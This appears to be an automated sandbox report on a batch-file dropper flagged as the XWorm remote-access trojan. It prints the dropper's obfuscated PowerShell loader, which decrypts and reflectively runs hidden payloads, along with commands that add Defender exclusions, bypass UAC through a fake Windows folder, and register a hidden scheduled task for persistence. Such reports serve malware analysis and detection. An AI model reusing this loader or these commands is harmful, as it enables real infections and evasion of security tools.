Description	Indicator	Process	Target
PID 2012 wrote to memory of 1828	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\cmd.exe
PID 2012 wrote to memory of 1828	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\cmd.exe
PID 2012 wrote to memory of 1828	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\cmd.exe
PID 2012 wrote to memory of 1916	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\cmd.exe
PID 2012 wrote to memory of 1916	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\cmd.exe
PID 2012 wrote to memory of 1916	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\cmd.exe
PID 2012 wrote to memory of 1984	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2012 wrote to memory of 1984	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2012 wrote to memory of 1984	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\81615530000729461941067939068992519669358735300091.bat"

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJtS7BW8TsXMaPIam1m2IRoAeCdHmqg1RBsmIhwSvhQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('o0gE9vmLtvavEDZl9H1iuQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xIQaF=New-Object System.IO.MemoryStream(,$param_var); $gboVG=New-Object System.IO.MemoryStream; $FotCK=New-Object System.IO.Compression.GZipStream($xIQaF, [IO.Compression.CompressionMode]::Decompress); $FotCK.CopyTo($gboVG); $FotCK.Dispose(); $xIQaF.Dispose(); $gboVG.Dispose(); $gboVG.ToArray();}function execute_function($param_var,$param2_var){ $nhluO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fbouC=$nhluO.EntryPoint; $fbouC.Invoke($null, $param2_var);}$BbFmy = 'C:\Users\Admin\AppData\Local\Temp\81615530000729461941067939068992519669358735300091.bat';$host.UI.RawUI.WindowTitle = $BbFmy;$XdayF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BbFmy).Split([Environment]::NewLine);foreach ($EYKSB in $XdayF) { if ($EYKSB.StartsWith('GTGaHqhKZrDmxohhGHXz')) { $CykjU=$EYKSB.Substring(20); break; }}$payloads_var=[string[]]$CykjU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

Network

N/A

Files

memory/1984-4-0x000007FEF599E000-0x000007FEF599F000-memory.dmp

memory/1984-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

memory/1984-7-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

memory/1984-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

memory/1984-8-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

memory/1984-9-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

memory/1984-10-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

memory/1984-11-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

memory/1984-12-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

memory/1984-13-0x000007FEF599E000-0x000007FEF599F000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 07:34

Reported

2024-06-12 07:37

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

52s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\81615530000729461941067939068992519669358735300091.bat"

Signatures

Detect Xworm Payload

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Executes dropped EXE

Description	Indicator	Process	Target
N/A	N/A	C:\Windows \System32\ComputerDefaults.exe	N/A

Loads dropped DLL

Description	Indicator	Process	Target
N/A	N/A	C:\Windows \System32\ComputerDefaults.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 33	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 34	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 35	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 36	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 33	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 34	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 35	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 36	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Suspicious use of SetWindowsHookEx

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 1936 wrote to memory of 4284	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\cmd.exe
PID 1936 wrote to memory of 4284	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\cmd.exe
PID 1936 wrote to memory of 2176	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\cmd.exe
PID 1936 wrote to memory of 2176	N/A	C:\Windows\system32\cmd.exe	C:\Windows\system32\cmd.exe
PID 1936 wrote to memory of 1056	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 1056	N/A	C:\Windows\system32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 1556	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 1556	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 3376	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\cmd.exe
PID 1056 wrote to memory of 3376	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\cmd.exe
PID 3376 wrote to memory of 2396	N/A	C:\Windows\System32\cmd.exe	C:\Windows \System32\ComputerDefaults.exe
PID 3376 wrote to memory of 2396	N/A	C:\Windows\System32\cmd.exe	C:\Windows \System32\ComputerDefaults.exe
PID 2396 wrote to memory of 3676	N/A	C:\Windows \System32\ComputerDefaults.exe	C:\Windows\SYSTEM32\cmd.exe
PID 2396 wrote to memory of 3676	N/A	C:\Windows \System32\ComputerDefaults.exe	C:\Windows\SYSTEM32\cmd.exe
PID 3676 wrote to memory of 4424	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\system32\cmd.exe
PID 3676 wrote to memory of 4424	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\system32\cmd.exe
PID 3676 wrote to memory of 1840	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\system32\cmd.exe
PID 3676 wrote to memory of 1840	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\system32\cmd.exe
PID 3676 wrote to memory of 1576	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3676 wrote to memory of 1576	N/A	C:\Windows\SYSTEM32\cmd.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 1792	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 1792	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 3224	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 3224	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 2876	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 2876	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 1816	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1576 wrote to memory of 1816	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 4456	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\cmd.exe
PID 1056 wrote to memory of 4456	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\cmd.exe
PID 1056 wrote to memory of 5056	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 5056	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 4332	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1056 wrote to memory of 4332	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\81615530000729461941067939068992519669358735300091.bat"

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"

C:\Windows \System32\ComputerDefaults.exe

"C:\Windows \System32\ComputerDefaults.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c call SC.cmd

C:\Windows\system32\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJtS7BW8TsXMaPIam1m2IRoAeCdHmqg1RBsmIhwSvhQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('o0gE9vmLtvavEDZl9H1iuQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xIQaF=New-Object System.IO.MemoryStream(,$param_var); $gboVG=New-Object System.IO.MemoryStream; $FotCK=New-Object System.IO.Compression.GZipStream($xIQaF, [IO.Compression.CompressionMode]::Decompress); $FotCK.CopyTo($gboVG); $FotCK.Dispose(); $xIQaF.Dispose(); $gboVG.Dispose(); $gboVG.ToArray();}function execute_function($param_var,$param2_var){ $nhluO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fbouC=$nhluO.EntryPoint; $fbouC.Invoke($null, $param2_var);}$BbFmy = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $BbFmy;$XdayF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BbFmy).Split([Environment]::NewLine);foreach ($EYKSB in $XdayF) { if ($EYKSB.StartsWith('GTGaHqhKZrDmxohhGHXz')) { $CykjU=$EYKSB.Substring(20); break; }}$payloads_var=[string[]]$CykjU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\81615530000729461941067939068992519669358735300091')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network

Files

memory/1056-0-0x00007FFCA8C23000-0x00007FFCA8C25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_waz04ggb.k3h.ps1

MD5	d17fe0a3f47be24a6453e9ef58c94641
SHA1	6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256	96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512	5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1056-10-0x00000184E95B0000-0x00000184E95D2000-memory.dmp

memory/1056-11-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

memory/1056-12-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

memory/1056-13-0x00000184E9970000-0x00000184E99B4000-memory.dmp

memory/1056-14-0x00000184E9A40000-0x00000184E9AB6000-memory.dmp

memory/1056-15-0x00000184E9320000-0x00000184E932A000-memory.dmp

memory/1056-17-0x00007FFCC6260000-0x00007FFCC631E000-memory.dmp

memory/1056-16-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/1056-18-0x00000184E9940000-0x00000184E9964000-memory.dmp

memory/1556-19-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

memory/1556-20-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

memory/1556-21-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

memory/1556-33-0x00007FFCA8C20000-0x00007FFCA96E1000-memory.dmp

C:\Windows \System32\ComputerDefaults.exe

MD5	d25a9e160e3b74ef2242023726f15416
SHA1	27a9bb9d7628d442f9b5cf47711c906e3315755b
SHA256	7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c
SHA512	bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910

C:\Windows \System32\MLANG.dll

MD5	8a9bfed8af000238af4b99880fe3d4cc
SHA1	47f00e89548a73d539bce69243007b9ba7d82515
SHA256	6c41e2d7b70570d7e4f251c471bd6ed7f2c37834edf55f2148b5e13fb362243e
SHA512	699b514aebd561e2f25bd28e670d9a1408c4c6c369a92cbdd6d973b845a49defbb23ef1060efeeabea19644b9ab2cbc4327ef5a6840880323bba591b95b8fb10

C:\Users\Admin\AppData\Local\Temp\SC.cmd

MD5	416aff758a2a587d89b208f7dabdb0ec
SHA1	7e908dee1cfc2885d688d8c0e9c03e88b66ea090
SHA256	897b124a4ef0a2886f3604babd1716017ac19577b5d74abca068ad24b21da4d6
SHA512	8b66d8193011d207d9b24b0a20b76e2099bd3bbaea47d0797faba7a6f9741cae95dc3d4d69943aaad7df882e10299dbdfc49d1325fd30c1128ecfd23a0474a46

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5	d85ba6ff808d9e5444a4b369f5bc2730
SHA1	31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256	84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512	8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1576-56-0x00007FFCC6260000-0x00007FFCC631E000-memory.dmp

memory/1576-55-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5	6d42b6da621e8df5674e26b799c8e2aa
SHA1	ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA256	5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA512	53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5	ef72c47dbfaae0b9b0d09f22ad4afe20
SHA1	5357f66ba69b89440b99d4273b74221670129338
SHA256	692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f
SHA512	7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5	1fa01acaf1f534c05ddeba961c38ecdb
SHA1	72a4ba7289e3dcdaf8c0ee0f6fcef656ae263d4a
SHA256	bf299be73206c6e7752270d69476d0e93bdbe768bca82ac8dc4b5e50fa53d63c
SHA512	849cb008277ef05453df5385e37152cabf4be89be6cbefa1d949a14de0fff5ae3427751b1c229df2449017687f04527e570da0b5b966a04dbc83a40b4bfff2f0

memory/1576-105-0x000002A279240000-0x000002A279250000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

